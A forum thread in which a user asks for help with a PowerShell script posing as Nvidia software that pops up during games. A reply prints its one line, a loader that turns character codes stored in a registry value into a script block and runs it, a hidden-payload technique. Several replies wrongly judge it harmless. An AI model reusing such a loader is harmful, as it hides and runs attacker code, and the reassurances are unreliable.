Can anyone analyze this script...

Halbour

Love yourself
OP
Member
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,107
Country
Israel
It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.
 

Attachments

  • 15EEF3A6-E215-43A2-8C70-9ADAF0719062.txt
    205 bytes · Views: 106

Halbour

Love yourself
OP
Member
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,107
Country
Israel
IDK, it just shows 4 PS Windows that dissappear after a few seconds... and take RAM in the Task Manager. Nothing else. But... it's really annoying, to know that the control on my PC isn't mine... and when it decides to show up in the middle of a game- I'm straight up screwed... annoyingly jumps in the middle of my Spider-swings..
Post automatically merged:

You should be fine, there seems to be nothing too malicious about it. Don't know what it does though I'm afraid.
Thank you for answering, though...!
 
  • Like
Reactions: SylverReZ

sombrerosonic

Idiot machine
Member
Joined
Jan 12, 2022
Messages
1,455
Trophies
2
Location
The Tower of pizza
XP
2,896
Country
United States
It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.
Try to delete it, then deep scanning your PC. the PS1 script seems to not be malicious, however better safe than sorry
 

JaapDaniels

Well-Known Member
Member
Joined
Apr 22, 2012
Messages
1,196
Trophies
1
Age
40
Website
github.com
XP
2,447
Country
Netherlands
It doesn't seem to be anything wrong... it looks to be a graphics settings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.
 

Halbour

Love yourself
OP
Member
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,107
Country
Israel
It doesn't seem to be anything wrong... it looks to be a graphics ettings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.
And in English..?
 

JaapDaniels

Well-Known Member
Member
Joined
Apr 22, 2012
Messages
1,196
Trophies
1
Age
40
Website
github.com
XP
2,447
Country
Netherlands
And in English..?
$variable1=[ScriptBlock]
$variable2=[string]
$variable3=[char]
icm ($variable1::Create($variable2::Join('', ((gp 'HKLM:\SOFTWARE\NVIDIA CorporationNVf6Cb').'VDzb5hT6' | % { [char]$_ })))).
HKLM:\SOFTWARE\NVIDIA Corporation = registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation.
i'm not 100% sure what the variables do from icm till gp, but it looks to be legit for a 3D emulator to write to the GPU interpretate $variable1 fixed location or so within the PS1 as overall beïng Scriptblock (naming it this way may help to keep the code easy to read... the same goes for string and char.
 

JaapDaniels

Well-Known Member
Member
Joined
Apr 22, 2012
Messages
1,196
Trophies
1
Age
40
Website
github.com
XP
2,447
Country
Netherlands
Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mine shit coins for someone else.
 
Last edited by JaapDaniels,

Halbour

Love yourself
OP
Member
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,107
Country
Israel
Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mai shit coins for someone else.
The thing is, I never got this script from someone...
 

JaapDaniels

Well-Known Member
Member
Joined
Apr 22, 2012
Messages
1,196
Trophies
1
Age
40
Website
github.com
XP
2,447
Country
Netherlands
I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.
 

SylverReZ

The planet is fine. The people are crazy.
Member
GBAtemp Patron
Joined
Sep 13, 2022
Messages
7,234
Trophies
3
Location
The Wired
Website
m4x1mumrez87.neocities.org
XP
22,178
Country
United Kingdom
I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.
I'm still using the good ol' Command Prompt and Terminal for everything.
 

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
  • The Real Jdbye @ The Real Jdbye:
    @dadadad delete sd:\atmosphere\contents
  • BigOnYa @ BigOnYa:
    You should find out from the mod dev how to uninstall it. Every mod is different on how you install/uninstall.
  • BigOnYa @ BigOnYa:
    @The Real Jdbye Wouldn't that take out bunch other stuff also?
  • D @ dadadad:
    Is it safe to delete the entire atmosphere folder? I don't remember what else was there, like edizon and tesla menu are installed through atmosphere, is it not a problem, will I not damage the system? There were too many mods, I won’t be able to contact each one, nothing was said about deleting in the description.
  • The Real Jdbye @ The Real Jdbye:
    @BigOnYa nothing that can't easily be replaced
    +1
  • The Real Jdbye @ The Real Jdbye:
    @dadadad no don't do that
  • The Real Jdbye @ The Real Jdbye:
    that will reset the configs
  • Arne214 @ Arne214:
    where can i find a clean copy of the mii maker for the wii u (EU)
  • SylverReZ @ SylverReZ:
    @Arne214, We don't ask for roms.
    +2
  • D @ dadadad:
    The installation was only through rofms and in the game folder in content. What else can I do?
  • Xdqwerty @ Xdqwerty:
    @SylverReZ, I already told them about that and yet they make a thread
  • SylverReZ @ SylverReZ:
    @Xdqwerty, Well I'm sure the mods will take care of it.
    +1
  • SylverReZ @ SylverReZ:
    Reminds me of that one Spanish guy who was in here a week or so ago, that wouldn't translate their messages.
  • Arne214 @ Arne214:
    ok sry
  • Xdqwerty @ Xdqwerty:
    @SylverReZ, I don't remember him
    +1
  • BigOnYa @ BigOnYa:
    @SylverReZ Si means yes, no means maybe
    +2
  • Xdqwerty @ Xdqwerty:
    @Arne214, it's fine but dont ask for roms here again
    +2
  • SylverReZ @ SylverReZ:
    @BigOnYa, I only know very little Spanish, haven't done it in 5 years lol.
    +1
  • Xdqwerty @ Xdqwerty:
    @SylverReZ, que tan poco?
  • BigOnYa @ BigOnYa:
    I took 3 years of Spanish in high school, ages ago but don't remb most of it. Like they say, if you don't use it, you lose it.
  • SylverReZ @ SylverReZ:
    @Xdqwerty, A bit. I only know greetings and some other parts. Its quite an easy language to learn.
  • SylverReZ @ SylverReZ:
    But I don't remember most of it.
    +1
  • Xdqwerty @ Xdqwerty:
    @SylverReZ, easy to learn despite having some relatively complex rules
    +1
  • D @ dadadad:
    Should I just accept that I won't play this game anymore, or is there a way to solve this problem?
  • BigOnYa @ BigOnYa:
    For so reason I remember a bunch of swear words tho, lol
    BigOnYa @ BigOnYa: For so reason I remember a bunch of swear words tho, lol